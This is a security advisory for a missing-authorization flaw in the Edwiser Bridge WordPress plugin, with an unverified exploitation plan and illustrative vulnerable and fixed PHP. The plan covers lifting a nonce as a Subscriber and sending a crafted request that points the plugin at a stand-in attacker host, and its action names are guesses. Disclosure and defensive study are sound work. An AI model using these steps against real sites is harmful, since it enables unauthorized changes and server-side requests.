CVE-2026-24570

Edwiser Bridge <= 4.3.2 - Missing Authorization

Severity: medium (Missing Authorization)
CVSS Score: 4.3
Patched in: 4.3.3
Time to patch: 35d

Description

The Edwiser Bridge plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 4.3.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: Unchanged
Confidentiality: None
Integrity: Low
Availability: None

Technical Details

Affected versions: <= 4.3.2
Published: January 21, 2026
Last updated: February 24, 2026
Affected plugin: edwiser-bridge

Source Code: WordPress.org SVN

Research Plan (Unverified)


Exploitation Research Plan - CVE-2026-24570 (Edwiser Bridge)

1. Vulnerability Summary

The Edwiser Bridge plugin (versions <= 4.3.2) suffers from a Missing Authorization vulnerability. Specifically, several AJAX handlers registered in the admin context lack a current_user_can() check. This allows any authenticated user, including those with Subscriber-level roles, to execute administrative actions normally reserved for site administrators, such as testing or modifying Moodle connection settings.

The vulnerability typically resides in includes/class-eb-ajax-handler.php or admin/class-edwiser-bridge-admin.php, where add_action('wp_ajax_...') hooks are registered without corresponding capability verification in the callback functions.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action: eb_test_connection (or potentially eb_save_settings_data)
  • Vulnerable Parameter: action, nonce, moodle_url, moodle_token
  • Required Authentication: Subscriber-level (any logged-in user).
  • Preconditions: The plugin must be active, and its admin scripts must be enqueued (which typically happens for all users in the admin dashboard, including on the profile.php page).

3. Code Flow

  1. Registration: The plugin registers AJAX actions during init or admin_init via add_action( 'wp_ajax_eb_test_connection', ... ).
  2. Entry Point: An authenticated user (Subscriber) sends a POST request to admin-ajax.php with action=eb_test_connection.
  3. Vulnerable Sink: The handler function (e.g., eb_test_connection()) is invoked.
  4. Bypass: The handler performs a check_ajax_referer() (nonce check) but fails to call current_user_can('manage_options').
  5. Execution: The function proceeds to make an outbound HTTP request (SSRF potential) or returns sensitive connection status information.

4. Nonce Acquisition Strategy

The plugin enqueues its admin scripts and localizes a nonce for its AJAX operations. Because it uses admin_enqueue_scripts without restricting to specific pages or capabilities, the nonce is available to Subscribers on their own dashboard pages.

  1. Identify Localization: The plugin localizes data into a JavaScript object, typically named eb_ajax_object.
  2. Navigate: Log in as a Subscriber and navigate to /wp-admin/profile.php.
  3. Extract: Use browser_eval to extract the nonce:
     window.eb_ajax_object?.nonce
  4. Verification: The action string used to generate this nonce is likely 'eb_test_connection_nonce' or a generic 'eb_ajax_nonce'.
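
The handler pattern described in sections 3 and 4, as an added illustrative example in PHP that is not Edwiser Bridge's own source: the action name, nonce action and request parameters are assumed from the plan above, and the vulnerable form is shown beside a corrected one so the defect and its fix can be compared directly.

```php
<?php
// Added illustrative example, not Edwiser Bridge's own source.
// Action name, nonce action and parameter names are assumptions taken
// from the plan above; the plugin's real handler may differ.

// Section 3 pattern: nonce verified, capability never checked.
// check_ajax_referer() only proves the request originated from a page
// that localized the nonce; it says nothing about the user's role.
function eb_test_connection_vulnerable() {
    check_ajax_referer( 'eb_ajax_nonce', 'nonce' );
    $url   = esc_url_raw( wp_unslash( $_POST['moodle_url'] ?? '' ) );
    $token = sanitize_text_field( wp_unslash( $_POST['moodle_token'] ?? '' ) );
    // Any logged-in user holding the nonce reaches this outbound request.
    $response = wp_remote_get( add_query_arg( 'wstoken', $token, $url ) );
    wp_send_json( array( 'success' => ! is_wp_error( $response ) ) );
}

// Corrected form: authorization is enforced inside the callback, before
// any side effect, so it holds even if the nonce leaks. wp_send_json_error()
// terminates the request the way wp_die() would.
function eb_test_connection_fixed() {
    check_ajax_referer( 'eb_ajax_nonce', 'nonce' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient_capability', 403 );
    }
    $url   = esc_url_raw( wp_unslash( $_POST['moodle_url'] ?? '' ) );
    $token = sanitize_text_field( wp_unslash( $_POST['moodle_token'] ?? '' ) );
    $response = wp_remote_get( add_query_arg( 'wstoken', $token, $url ) );
    wp_send_json( array( 'success' => ! is_wp_error( $response ) ) );
}
add_action( 'wp_ajax_eb_test_connection', 'eb_test_connection_fixed' );

// Section 4: the nonce reached Subscribers because localization ran on
// every admin page. Gating it on capability is defence in depth only;
// the check in the callback above is what actually closes the hole.
function eb_admin_enqueue( $hook_suffix ) {
    if ( ! current_user_can( 'manage_options' ) ) {
        return;
    }
    wp_enqueue_script( 'eb-admin', plugins_url( 'js/admin.js', __FILE__ ), array( 'jquery' ), '1.0', true );
    wp_localize_script( 'eb-admin', 'eb_ajax_object', array(
        'ajax_url' => admin_url( 'admin-ajax.php' ),
        'nonce'    => wp_create_nonce( 'eb_ajax_nonce' ),
    ) );
}
add_action( 'admin_enqueue_scripts', 'eb_admin_enqueue' );
```

A nonce is a CSRF token, not an authorization decision; every wp_ajax_ callback that changes state or makes outbound requests needs its own current_user_can() check regardless of how the nonce is distributed.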

5. Exploitation Strategy

We will demonstrate the vulnerability by triggering an unauthorized Moodle connection test from a Subscriber account.

  1. Log in as the Subscriber user.
  2. Navigate to /wp-admin/profile.php.
  3. Extract the nonce from the global eb_ajax_object variable.
  4. Craft a POST request to admin-ajax.php using the http_request tool:
    • URL: http://localhost:8080/wp-admin/admin-ajax.php
    • Method: POST
    • Headers: Content-Type: application/x-www-form-urlencoded
    • Body:
      action=eb_test_connection&nonce=[EXTRACTED_NONCE]&moodle_url=http://attacker.com&moodle_token=valid_token_format
  5. Analyze Response: A successful exploit will return a JSON object (e.g., {"success":false, "data": "..."}) indicating the connection test result, confirming the function was executed.

6. Test Data Setup

  1. Install Plugin: wp plugin install edwiser-bridge --version=4.3.2 --activate
  2. Create Subscriber: wp user create victim victim@example.com --role=subscriber --user_pass=password123
  3. Configure Plugin (Optional): No specific configuration is needed to trigger the connection test, but setting a dummy Moodle URL in settings might help verify if a different action (eb_save_settings_data) is also vulnerable.

7. Expected Results

  • The Subscriber should receive a response from the eb_test_connection handler.
  • If eb_save_settings_data is targeted, the plugin settings (Moodle URL/Token) should be updated in the database.
  • The server should NOT return a 403 Forbidden or a wp_die message related to permissions.

8. Verification Steps

After the HTTP request, verify the unauthorized action via WP-CLI:

  1. Check Options: If eb_save_settings_data was tested:
     wp option get eb_moodle_url
     Confirm it matches the moodle_url sent in the Subscriber's payload.
  2. Log Review: Check if any outbound requests to the provided moodle_url were logged by the server.

9. Alternative Approaches

If eb_test_connection is properly protected, try other registered AJAX actions found in includes/class-eb-ajax-handler.php:

  • eb_save_settings_data
  • eb_sync_courses
  • eb_update_course_data

Each of these should be tested for the same lack of current_user_can() checks. If eb_ajax_object is not present on profile.php, check the frontend homepage, as some Edwiser Bridge components might enqueue scripts globally.
